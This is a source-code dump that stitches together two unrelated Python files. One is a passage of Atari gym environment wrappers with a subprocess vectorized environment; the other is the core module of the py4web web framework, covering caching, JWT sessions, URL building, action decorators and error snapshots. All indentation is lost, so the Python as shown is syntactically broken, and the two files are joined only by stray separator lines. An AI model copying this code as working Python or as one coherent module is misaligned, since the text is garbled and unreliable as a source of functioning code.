gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def _reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class ImageSaver(gym.Wrapper):
def __init__(self, env, img_path, rank):
gym.Wrapper.__init__(self, env)
self._cnt = 0
self._img_path = img_path
self._rank = rank
def _step(self, action):
step_result = self.env.step(action)
obs, _, _, _ = step_result
img = Image.fromarray(obs, 'RGB')
img.save('%s/out%d-%05d.png' % (self._img_path, self._rank, self._cnt))
self._cnt += 1
return step_result
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def _step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert somtimes we stay in lives == 0 condtion for a few frames
# so its important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def _reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def _step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, info
def _reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(self.res, self.res, 1), dtype='uint8')
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array([0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(shp[0], shp[1], k), dtype='uint8')
def _reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k): self.frames.append(ob)
return self._observation()
def _step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
# envs.py
def make_env(env_id, img_dir, seed, rank):
def _thunk():
env = gym.make(env_id)
env.seed(seed + rank)
if img_dir is not None:
env = ImageSaver(env, img_dir, rank)
env = wrap_deepmind(env)
env = WrapPyTorch(env)
return env
return _thunk
class WrapPyTorch(gym.ObservationWrapper):
def __init__(self, env=None):
super(WrapPyTorch, self).__init__(env)
self.observation_space = gym.spaces.Box(0.0, 1.0, [1, 84, 84], dtype='float32')
def _observation(self, observation):
return observation.transpose(2, 0, 1)
# vecenv.py
class VecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
# subproc_vec_env.py
def worker(remote, env_fn_wrapper):
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
# Create the environment.
def make(env_name, img_dir, num_processes):
envs = SubprocVecEnv([
make_env(env_name, img_dir, 1337, i) for i in range(num_processes)
])
return envs
|
core.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PY4WEB - a web framework for rapid development of efficient database driven web applications"""
# Standard modules
import asyncio
import cgitb
import code
import copy
import datetime
import enum
import functools
import http.client
import http.cookies
import importlib.machinery
import importlib.util
import inspect
import json
import linecache
import logging
import numbers
import os
import pathlib
import platform
import portalocker
import re
import signal
import sys
import threading
import time
import traceback
import types
import urllib.parse
import uuid
import zipfile
import io
from contextlib import redirect_stdout
from collections import OrderedDict
from watchgod import awatch
from . import server_adapters
# Optional web servers for speed
try:
import gunicorn
except ImportError:
gunicorn = None
# Third party modules
import ombott as bottle
import click
import jwt # this is PyJWT
import pluralize
import pydal
import threadsafevariable
import yatl
import renoir
import renoir.constants
import renoir.writers
bottle.DefaultConfig.max_memfile_size = 16 * 1024 * 1024
bottle.DefaultConfig.app_name_header = "HTTP_X_PY4WEB_APPNAME"
# apply DefaultConfig changes to default_app
bottle.default_app().setup()
__all__ = [
"render",
"DAL",
"Field",
"action",
"request",
"response",
"redirect",
"abort",
"HTTP",
"Session",
"Cache",
"Flash",
"user_in",
"Translator",
"URL",
"check_compatible",
"required_folder",
"wsgi",
]
PY4WEB_CMD = sys.argv[0]
REGEX_APPJSON = r"(^|\s|,)application/json(,|\s|$)"
DEFAULTS = dict(
PY4WEB_APPS_FOLDER="apps",
PY4WEB_SERVICE_FOLDER=".service",
PY4WEB_SERVICE_DB_URI="sqlite://service.storage",
)
HELPERS = {name: getattr(yatl.helpers, name) for name in yatl.helpers.__all__}
_DEFAULT_APP_ROOTS = set()
ART = r"""
██████╗ ██╗ ██╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔══██╗╚██╗ ██╔╝██║ ██║██║ ██║██╔════╝██╔══██╗
██████╔╝ ╚████╔╝ ███████║██║ █╗ ██║█████╗ ██████╔╝
██╔═══╝ ╚██╔╝ ╚════██║██║███╗██║██╔══╝ ██╔══██╗
██║ ██║ ██║╚███╔███╔╝███████╗██████╔╝
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚═════╝
Is still experimental...
"""
Field = pydal.Field
request = bottle.request
response = bottle.response
abort = bottle.abort
os.environ.update(
{key: value for key, value in DEFAULTS.items() if key not in os.environ}
)
os.environ["PY4WEB_PATH"] = str(pathlib.Path(__file__).resolve().parents[1])
# hold all framework hooks in one place
# NOTE: `after_request` hooks are not currently used
_REQUEST_HOOKS = types.SimpleNamespace(before=set())
def _before_request(*args, **kw):
[h(*args, **kw) for h in _REQUEST_HOOKS.before]
bottle.default_app().add_hook("before_request", _before_request)
def module2filename(module):
filename = os.path.join(*module.split(".")[1:])
filename = (
os.path.join(filename, "__init__.py")
if not filename.count(os.sep)
else filename + ".py"
)
return filename
def required_folder(*parts):
"""joins the args and creates the folder if not exists"""
path = os.path.join(*parts)
if not os.path.exists(path):
os.makedirs(path)
assert os.path.isdir(path), "%s is not a folder as required" % path
return path
def safely(func, exceptions=(Exception,), log=False, default=None):
"""
runs the funnction and returns True on success,
False if one of the exceptions is raised
"""
try:
return func()
except exceptions as err:
if log:
logging.warn(str(err))
return default() if callable(default) else default
########################################################################################
# Implement a O(1) LRU cache and memoize with expiration and monitoring (using linked list)
#########################################################################################
class Node:
def __init__(self, key=None, value=None, t=None, m=None, prev=None, next=None):
self.key, self.value, self.t, self.m, self.prev, self.next = (
key,
value,
t,
m,
prev,
next,
)
class Cache:
"""
O(1) caching object that remembers the 'size' most recent values
Example:
cache = Cache(size=1000)
h = cache.get(filename, lambda: hash(
open(filename).read()), 60, lambda: os.path.getmtime())
(computes and cashes the hash of file filename but only reads the file if mtime changes and
does not check the mtime more oftern than every 60. caches the 1000 most recent hashes)
"""
def __init__(self, size=1000):
self.free = size
self.head = Node()
self.tail = Node()
self.head.next = self.tail
self.tail.prev = self.head
self.mapping = {}
self.lock = threading.Lock()
def get(self, key, callback, expiration=3600, monitor=None):
"""If key not stored or key has expired and monitor == None or monitor() value has changed, returns value = callback()"""
node, t0 = self.mapping.get(key), time.time()
with self.lock:
if node:
# if a node was found remove it from storage
value, t, node.next.prev, node.prev.next = (
node.value,
node.t,
node.prev,
node.next,
)
else:
self.free -= 1
# check if something may invalidate cache
m = monitor() if monitor else None
# check if cache expired
if node and node.t + expiration < t0:
# if cache should always be invalidated or m changed
if m is None or node.m != m:
# ignore the value found
node = None
if node is None:
value, t = callback(), t0
# add the new node back into storage
with self.lock:
new_node = Node(key, value, t, m, prev=self.head, next=self.head.next)
self.mapping[key] = self.head.next = new_node.next.prev = new_node
if self.free < 0:
last_node = self.tail.prev
self.tail.prev, last_node.prev.next = last_node.prev, self.tail
del self.mapping[last_node.key]
self.free += 1
return value
def memoize(self, expiration=3600):
def decorator(func):
@functools.wraps(func)
def memoized_func(*args, **kwargs):
key = "%s:%s:%s:%s" % (func.__module__, func.__name__, args, kwargs)
return self.get(
key,
lambda args=args, kwargs=kwargs: func(*args, **kwargs),
expiration=expiration,
)
return memoized_func
return decorator
#########################################################################################
# A Better JSON Serializer
#########################################################################################
def objectify(obj):
"""converts the obj(ect) into a json serializable object"""
if isinstance(obj, numbers.Integral):
return int(obj)
elif isinstance(obj, (numbers.Rational, numbers.Real)):
return float(obj)
elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):
return obj.isoformat().replace("T", " ")
elif isinstance(obj, str):
return obj
elif isinstance(obj, dict):
return obj
elif hasattr(obj, "as_list"):
return obj.as_list()
elif hasattr(obj, "as_dict"):
return obj.as_dict()
elif hasattr(obj, "__iter__") or isinstance(obj, types.GeneratorType):
return list(obj)
elif hasattr(obj, "xml"):
return obj.xml()
elif isinstance(
obj, enum.Enum
): # Enum class handled specially to address self reference in __dict__
return dict(name=obj.name, value=obj.value, __class__=obj.__class__.__name__)
elif hasattr(obj, "__dict__") and hasattr(obj, "__class__"):
d = dict(obj.__dict__)
d["__class__"] = obj.__class__.__name__
return d
return str(obj)
def dumps(obj, sort_keys=True, indent=2):
return json.dumps(obj, default=objectify, sort_keys=sort_keys, indent=indent)
#########################################################################################
# Base Fixture (database connections, templates, sessions, and requirements are fixtures)
#########################################################################################
class Fixture:
__request_master_ctx__ = threading.local()
__fixture_debug__ = False
@classmethod
def __init_request_ctx__(cls):
cls.__request_master_ctx__.request_ctx = dict()
@classmethod
def __mount_local__(cls, self, storage):
cls.__request_master_ctx__.request_ctx[self] = storage
@property
def _safe_local(self):
try:
ret = self.__request_master_ctx__.request_ctx[self]
except (KeyError, AttributeError) as err:
msg = "py4web hint: check @action.uses() for the missing fixture {}".format(
self
)
raise RuntimeError(msg) from err
return ret
@_safe_local.setter
def _safe_local(self, storage):
self.__mount_local__(self, storage)
def is_valid(self):
"""check if the fixture is valid in context"""
try:
self.__request_master_ctx__.request_ctx[self]
return True
except (KeyError, AttributeError) as err:
logging.warn(
"attempted access to fixture %s from outside a request",
self.__class__.__name,
)
return False
def on_request(self):
pass # called when a request arrives
def on_error(self):
pass # called when a request errors
def on_success(self, status):
pass # called when a request is successful
def finalize(self):
pass # called in any case at the end of a request
def transform(
self, output, shared_data=None
): # transforms the output, for example to apply template
return output
_REQUEST_HOOKS.before.add(Fixture.__init_request_ctx__)
class Translator(pluralize.Translator, Fixture):
def on_request(self):
self.select(request.headers.get("Accept-Language", "en"))
def on_success(self, status):
response.headers["Content-Language"] = self.local.tag
class DAL(pydal.DAL, Fixture):
reconnect_on_request = True
def on_request(self):
if self.reconnect_on_request:
self._adapter.reconnect()
threadsafevariable.ThreadSafeVariable.restore(ICECUBE)
def on_error(self):
self.rollback()
def on_success(self, status):
self.commit()
# make sure some variables in pydal are thread safe
def thread_safe_pydal_patch():
Field = pydal.DAL.Field
tsafe_attrs = [
"readable",
"writable",
"default",
"filter_in",
"filter_out",
"label",
"update",
"requires",
"widget",
"represent",
]
for a in tsafe_attrs:
b = threadsafevariable.ThreadSafeVariable()
setattr(Field, a, b)
# hack 'copy.copy' behavior, since it makes a shallow copy,
# but ThreadSafe-attributes (see above) are class-level, so:
# no copy -> no attr in ICECUBE for the fresh one -> gevent-error on try to access to any of ThreadSafe-attributes
def field_copy(self):
# to prevent infinite recursion
# temporarily set __copy__ to None
me = self.__class__.__copy__
self.__class__.__copy__ = None
clone = copy.copy(self)
self.__class__.__copy__ = me
for a in tsafe_attrs:
setattr(clone, a, getattr(self, a))
return clone
# to avoid possible future problems
if hasattr(Field, "__copy__"):
raise RuntimeError("code fix required!")
setattr(Field, "__copy__", field_copy)
thread_safe_pydal_patch()
# this global object will be used to store their state to restore it for every http request
ICECUBE = {}
#########################################################################################
# Flash Fixture
#########################################################################################
class Flash(Fixture):
"""
flash = Flash()
@action('index')
@action.uses(flash)
def index():
flash.set('hello', _class='important')
return dict()
Flash messages are added to the dict and, upon redirect, carry forward
Also notice all Flash objects share the same threading local so act as singletons
"""
# this essential makes flash a singleton
# necessary because auth defines its own flash
# possible because flash does not depend on the app
@property
def local(self):
return self._safe_local
def on_request(self):
self._safe_local = types.SimpleNamespace()
# when a new request arrives we look for a flash message in the cookie
flash = request.get_cookie("py4web-flash")
if flash:
self.local.flash = json.loads(flash)
else:
self.local.flash = None
def on_success(self, status):
# if we redirect and have a flash message we move it to the session
if status == 303 and self.local.flash:
response.set_cookie("py4web-flash", json.dumps(self.local.flash), path="/")
else:
response.delete_cookie("py4web-flash", path="/")
def finalize(self):
"""Clears the local to prevent leakage."""
self.local.__dict__.clear()
def set(self, message, _class="", sanitize=True):
# we set a flash message
if sanitize:
message = yatl.sanitizer.xmlescape(message)
self.local.flash = {"message": message, "class": _class}
def transform(self, data, shared_data=None):
# if we have a valid flash message, we inject it in the response dict
if isinstance(data, dict):
if "flash" not in data:
data["flash"] = self.local.flash or ""
else:
if self.local.flash is not None:
response.headers["component-flash"] = json.dumps(self.local.flash)
self.local.flash = None
return data
#########################################################################################
# The Template Rendered Fixture
#########################################################################################
class RenoirXMLEscapeMixin:
def _escape_data(self, data):
"""Allows Renoir to convert yatl helpers to strings"""
return safely(
lambda: data.xml(), default=lambda: self._to_html(self._to_unicode(data))
)
class RenoirCustomWriter(RenoirXMLEscapeMixin, renoir.writers.Writer):
...
class RenoirCustomEscapeAllWriter(RenoirXMLEscapeMixin, renoir.writers.EscapeAllWriter):
...
class Renoir(renoir.Renoir):
"""Custom Renoir Engine that understands yatl helpers"""
_writers = {
renoir.constants.ESCAPES.common: RenoirCustomWriter,
renoir.constants.ESCAPES.all: RenoirCustomEscapeAllWriter,
}
def render(
content=None,
filename=None,
path=".",
context={},
delimiters="[[ ]]",
cached_renoir_engines=Cache(100),
):
"""
renders the template using renoire, same API as yatl.render, does caching of
both Renoire engine and source files
"""
engine = cached_renoir_engines.get(
(path, delimiters),
lambda: Renoir(path=path, delimiters=delimiters.split(" "), reload=True),
)
if content is not None:
return engine._render(content, context=context)
return engine.render(filename, context=context)
class Template(Fixture):
cache = Cache(100)
def __init__(self, filename, path=None, delimiters="[[ ]]"):
self.filename = filename
self.path = path
self.delimiters = delimiters
def transform(self, output, shared_data=None):
if not isinstance(output, dict):
return output
context = dict(request=request)
context.update(HELPERS)
context.update(URL=URL)
if shared_data:
context.update(shared_data.get("template_context", {}))
context.update(output)
context["__vars__"] = output
app_folder = os.path.join(os.environ["PY4WEB_APPS_FOLDER"], request.app_name)
path = self.path or os.path.join(app_folder, "templates")
filename = os.path.join(path, self.filename)
if not os.path.exists(filename):
generic_filename = os.path.join(path, "generic.html")
if os.path.exists(generic_filename):
filename = generic_filename
output = render(
filename=filename, path=path, context=context, delimiters=self.delimiters
)
return output
#########################################################################################
# The Session Fixture
#########################################################################################
class Session(Fixture):
# All apps share the same default secret if not specified.
# important for _dashboard reload
# the actual value is loaded from a file
SECRET = None
@property
def local(self):
return self._safe_local
def __init__(
self,
secret=None,
expiration=None,
algorithm="HS256",
storage=None,
same_site="Lax",
):
"""
secret is the shared key used to encrypt the session (using algorithm)
expiration is in seconds
(optional) storage must have a get(key) and set(key,value,expiration) methods
if not provided session is stored in jwt cookie else the jwt is stored in storage and its uuid key is stored in the cookie
"""
# assert Session.SECRET, "Missing Session.SECRET"
self.secret = secret or Session.SECRET
self.expiration = expiration
self.algorithm = algorithm
self.storage = storage
self.same_site = same_site
if isinstance(storage, Session):
self.__prerequisites__ = [storage]
if hasattr(storage, "__prerequisites__"):
self.__prerequisites__ = storage.__prerequisites__
def initialize(self, app_name="unknown", data=None, changed=False, secure=False):
self._safe_local = types.SimpleNamespace()
local = self.local
local.changed = changed
local.data = data or {}
local.session_cookie_name = "%s_session" % app_name
local.secure = secure
def load(self):
self.initialize(
app_name=request.app_name,
changed=False,
secure=request.url.startswith("https"),
)
self_local = self.local
raw_token = request.get_cookie(
self_local.session_cookie_name
) or request.query.get("_session_token")
if not raw_token and request.method in {"POST", "PUT", "DELETE", "PATCH"}:
raw_token = (
request.forms
and request.forms.get("_session_token")
or request.json
and request.json.get("_session_token")
)
if Fixture.__fixture_debug__:
logging.debug("Session token found %s", raw_token)
if raw_token:
token_data = raw_token.encode()
try:
if self.storage:
json_data = self.storage.get(token_data)
if json_data:
self_local.data = json.loads(json_data)
else:
self_local.data = jwt.decode(
token_data, self.secret, algorithms=[self.algorithm]
)
if self.expiration is not None and self.storage is None:
assert self_local.data["timestamp"] > time.time() - int(
self.expiration
)
assert self.get_data().get("secure") == self_local.secure
except Exception as err:
if Fixture.__fixture_debug__:
logging.debug("Session error %s", err)
if "uuid" not in self.get_data():
self.clear()
def get_data(self):
return getattr(self.local, "data", {})
def save(self):
self_local = self.local
self_local.data["timestamp"] = time.time()
if self.storage:
cookie_data = self_local.data["uuid"]
self.storage.set(cookie_data, json.dumps(self_local.data), self.expiration)
else:
cookie_data = jwt.encode(
self_local.data, self.secret, algorithm=self.algorithm
)
if isinstance(cookie_data, bytes):
cookie_data = cookie_data.decode()
if Fixture.__fixture_debug__:
logging.debug("Session stored %s", cookie_data)
response.set_cookie(
self_local.session_cookie_name,
cookie_data,
path="/",
secure=self_local.secure,
same_site=self.same_site,
)
def get(self, key, default=None):
return self.get_data().get(key, default)
def __getitem__(self, key):
return self.get_data()[key]
def __delitem__(self, key):
if key in self.get_data():
self.local.changed = True
del self.local.data[key]
def __setitem__(self, key, value):
self.local.changed = True
self.local.data[key] = value
def keys(self):
return self.get_data().keys()
def __iter__(self):
yield from self.get_data().items()
def clear(self):
"""Produces a brand-new session."""
self_local = self.local
self_local.changed = True
self_local.data.clear()
self_local.data["uuid"] = str(uuid.uuid1())
self_local.data["secure"] = self_local.secure
def on_request(self):
self.load()
def on_error(self):
if self.local.changed:
self.save()
def on_success(self, status):
if self.local.changed:
self.save()
#########################################################################################
# The URL Helper
#########################################################################################
def URL(
*parts,
vars=None,
hash=None,
scheme=False,
signer=None,
use_appname=None,
static_version=None,
):
"""
Examples:
URL('a','b',vars=dict(x=1),hash='y') -> /{script_name?}/{app_name?}/a/b?x=1#y
URL('a','b',vars=dict(x=1),scheme=None) -> //{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),scheme=True) -> http://{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),scheme='https') -> https://{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),use_appname=False) -> /{script_name?}/a/b?x=1
"""
if use_appname is None:
# force use_appname on domain-unmapped apps
use_appname = not request.environ.get("HTTP_X_PY4WEB_APPNAME")
if use_appname:
# app_name is not set by py4web shell
app_name = getattr(request, "app_name", None)
has_appname = use_appname and app_name
script_name = (
request.environ.get("SCRIPT_NAME", "")
or request.environ.get("HTTP_X_SCRIPT_NAME", "")
).rstrip("/")
if parts and parts[0].startswith("/"):
prefix = ""
elif has_appname and app_name != "_default":
prefix = "%s/%s/" % (script_name, app_name)
else:
prefix = "%s/" % script_name
broken_parts = []
for part in parts:
broken_parts += str(part).rstrip("/").split("/")
if static_version != "" and broken_parts and broken_parts[0] == "static":
if not static_version:
# try to retrieve from __init__.py
app_module = "apps.%s" % app_name if has_appname else "apps"
try:
static_version = getattr(
sys.modules[app_module], "__static_version__", None
)
except KeyError:
static_version = None
if static_version:
broken_parts.insert(1, "_" + static_version)
url = prefix + "/".join(map(urllib.parse.quote, broken_parts))
# Signs the URL if required. Copy vars into urlvars not to modify it.
urlvars = dict(vars) if vars else {}
if signer:
# Note that we need to sign the non-urlencoded URL, since
# at verification time, it will be already URLdecoded.
signer.sign(prefix + "/".join(broken_parts), urlvars)
if urlvars:
url += "?" + "&".join(
"%s=%s" % (k, urllib.parse.quote(str(v))) for k, v in urlvars.items()
)
if hash:
url += "#%s" % hash
if scheme is not False:
original_url = request.environ.get("HTTP_ORIGIN") or request.url
orig_scheme, _, domain = original_url.split("/", 3)[:3]
if scheme is True:
scheme = orig_scheme
elif scheme is None:
scheme = ""
else:
scheme += ":"
url = "%s//%s%s" % (scheme, domain, url)
return url
#########################################################################################
# The Action Decorator
#########################################################################################
class HTTP(BaseException):
class Type:
success = "success"
error = "error"
"""Our HTTP exception does not delete cookies and headers like the bottle.HTTPResponse does;
since it is considered a success, not a failure"""
def __init__(self, status, type=Type.success):
self.status = status
self.type = type
def redirect(location):
"""our redirect does not delete cookies and headers like bottle.HTTPResponse does;
it is considered a success, not failure"""
response.headers["Location"] = location
raise HTTP(303)
class action:
"""@action(...) is a decorator for functions to be exposed as actions"""
registered = set()
app_name = "_default"
def __init__(self, path, **kwargs):
self.path = path
self.kwargs = kwargs
@staticmethod
def uses(*fixtures_in):
"""Find all fixtures, including dependencies, topologically sorted"""
fixtures = []
reversed_fixtures = []
stack = list(fixtures_in)
while stack:
fixture = stack.pop()
reversed_fixtures.append(fixture)
stack.extend(getattr(fixture, "__prerequisites__", ()))
for fixture in reversed(reversed_fixtures):
if isinstance(fixture, str):
fixture = Template(fixture)
if fixture not in fixtures:
fixtures.append(fixture)
def decorator(func):
if Fixture.__fixture_debug__:
# in debug mode log all calls to fixtures
def call(obj, f, args=()):
logging.debug("Calling %s.%s", obj.__class__.__name__, f)
return getattr(obj, f)(*args)
else:
def call(obj, f, args=()):
return getattr(obj, f)(*args)
@functools.wraps(func)
def wrapper(*args, **kwargs):
# data shared by all fixtures in the pipeline for each request
shared_data = {"template_context": {}}
try:
for obj in fixtures:
call(obj, "on_request")
ret = func(*args, **kwargs)
for obj in fixtures:
ret = call(obj, "transform", (ret, shared_data))
for obj in fixtures:
call(obj, "on_success", (200,))
return ret
except HTTP as http:
if http.type == http.Type.success:
for obj in fixtures:
call(obj, "on_success", (http.status,))
else:
if obj in fixtures:
call(obj, "on_error")
raise
except Exception:
for obj in fixtures:
call(obj, "on_error")
raise
finally:
for obj in fixtures:
call(obj, "finalize")
# Clears the current object to prevent leakage.
return wrapper
return decorator
@staticmethod
def requires(*requirements):
"""Enforces requirements or calls bottle.abort(401)"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
for requirement in requirements:
if not requirement():
bottle.abort(401)
return func(*args, **kwargs)
return wrapper
return decorator
@staticmethod
def catch_errors(app_name, func):
"""Catches and logs errors in an action; also sets request.app_name"""
@functools.wraps(func)
def wrapper(*func_args, **func_kwargs):
try:
request.app_name = app_name
ret = func(*func_args, **func_kwargs)
if isinstance(ret, dict):
response.headers["Content-Type"] = "application/json"
ret = dumps(ret)
return ret
except HTTP as http:
response.status = http.status
ret = getattr(http, "body", "")
http_headers = getattr(http, "headers", None)
if http_headers:
response.headers.update(http_headers)
return ret
except bottle.HTTPResponse:
raise
except Exception:
snapshot = get_error_snapshot()
logging.error(snapshot["traceback"])
ticket_uuid = error_logger.log(request.app_name, snapshot) or "unknown"
raise bottle.HTTPResponse(
body=error_page(
500,
button_text=ticket_uuid,
href="/_dashboard/ticket/" + ticket_uuid,
),
status=500,
)
return wrapper
def __call__(self, func):
"""Building the decorator"""
app_name = action.app_name
if self.path[0] == "/":
path = self.path.rstrip("/") or "/"
else:
if app_name == "_default":
base_path = ""
_DEFAULT_APP_ROOTS.add(self.path.split("/", 1)[0])
else:
base_path = f"/{app_name}"
path = (f"{base_path}/{self.path}").rstrip("/")
if func not in self.registered:
func = action.catch_errors(app_name, func)
func = bottle.route(path, **self.kwargs)(func)
if path.endswith("/index"): # /index is always optional
func = bottle.route(path[:-6] or "/", **self.kwargs)(func)
self.registered.add(func)
return func
def user_in(session):
def requirement():
session.on_request()
return session.get("user", None) is not None
return requirement
#########################################################################################
# Monkey Patch: Cookies
#########################################################################################
http.cookies.Morsel._reserved["same-site"] = "SameSite"
#########################################################################################
# Monkey Patch: ssl bug for gevent
#########################################################################################
__ssl__ = __import__("ssl")
_ssl = getattr(__ssl__, "_ssl") or getattr(__ssl__, "_ssl2")
def new_sslwrap(
sock,
server_side=False,
keyfile=None,
certfile=None,
cert_reqs=__ssl__.CERT_NONE,
ssl_version=__ssl__.PROTOCOL_SSLv23,
ca_certs=None,
ciphers=None,
):
context = __ssl__.SSLContext(ssl_version)
context.verify_mode = cert_reqs or __ssl__.CERT_NONE
if ca_certs:
context.load_verify_locations(ca_certs)
if certfile:
context.load_cert_chain(certfile, keyfile)
if ciphers:
context.set_ciphers(ciphers)
caller_self = inspect.currentframe().f_back.f_locals["self"]
return context._wrap_socket(sock, server_side=server_side, ssl_sock=caller_self)
#########################################################################################
# Error Handling
#########################################################################################
def get_error_snapshot(depth=5):
"""Return a dict describing a given traceback (based on cgitb.text)."""
tb = traceback.format_exc()
errorlog = os.environ.get("PY4WEB_ERRORLOG")
if errorlog:
msg = f"[{datetime.datetime.now().isoformat()}]: {tb}\n"
if errorlog == ":stderr":
sys.stderr.write(msg)
elif errorlog == ":stdout":
sys.stdout.write(msg)
elif errorlog == "tickets_only":
pass
else:
with portalocker.Lock(errorlog, "a", timeout=2) as fp:
fp.write(msg)
etype, evalue, etb = sys.exc_info()
if isinstance(etype, type):
etype = etype.__name__
data = {}
data["timestamp"] = datetime.datetime.utcnow().isoformat().replace("T", " ")
data["python_version"] = sys.version
platform_keys = [
"machine",
"node",
"platform",
"processor",
"python_branch",
"python_build",
"python_compiler",
"python_implementation",
"python_revision",
"python_version",
"python_version_tuple",
"release",
"system",
"uname",
"version",
]
data["platform_info"] = {key: getattr(platform, key)() for key in platform_keys}
data["os_environ"] = {key: str(value) for key, value in os.environ.items()}
data["traceback"] = tb
data["exception_type"] = str(etype)
data["exception_value"] = str(evalue)
# Loopover the stack frames
items = inspect.getinnerframes(etb, depth)
del etb # Prevent circular references that would cause memory leaks
data["stackframes"] = stackframes = []
for frame, file, lnum, func, lines, idx in items:
file = file and os.path.abspath(file) or "?"
args, varargs, varkw, locals = inspect.getargvalues(frame)
# Basic frame information
f = {"file": file, "func": func, "lnum": lnum}
f["code"] = lines
# FIXME: disable this for now until we understand why this goes into infinite loop
if False:
line_vars = cgitb.scanvars(
lambda: linecache.getline(file, lnum), frame, locals
)
# Dump local variables (referenced in current line only)
f["vars"] = {
key: repr(value)
for key, value in locals.items()
if not key.startswith("__")
}
stackframes.append(f)
return data
class SimpleErrorLogger:
def log(self, app_name, snapshot):
"""logs the error"""
